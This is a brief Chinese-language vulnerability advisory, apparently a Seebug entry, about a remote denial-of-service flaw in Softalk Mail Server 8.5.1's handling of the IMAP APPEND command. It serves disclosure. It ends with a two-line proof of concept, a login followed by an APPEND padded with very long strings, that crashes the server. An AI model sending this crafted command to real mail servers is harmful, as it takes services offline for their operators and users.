Softalk Mail Server 'APPEND'命令远程拒绝服务漏洞

2008-09-10T00:00:00
ID SSV:3967
Type seebug
Reporter Root
Modified 2008-09-10T00:00:00

Description

BUGTRAQ ID: 30970 CNCAN ID:CNCAN-2008090309 Softalk Mail Server是一款邮件服务程序。 Softalk Mail Server IMAP服务不正确处理APPEND命令,远程攻击者可以利用漏洞对服务程序进行拒绝服务攻击。 提交特殊构建的APPEND命令给IMAP服务处理,可导致应用程序崩溃。

Softalk Mail Server 8.5.1 目前没有解决方案提供: <a href=http://www.softalkltd.com/ target=_blank>http://www.softalkltd.com/</a>

                                        
                                            
                                                A001 LOGIN user password
A01 APPEND Ax5000 (UIDNEXT MESSAGES) (?) Ax5000 (UIDNEXT MESSAGES)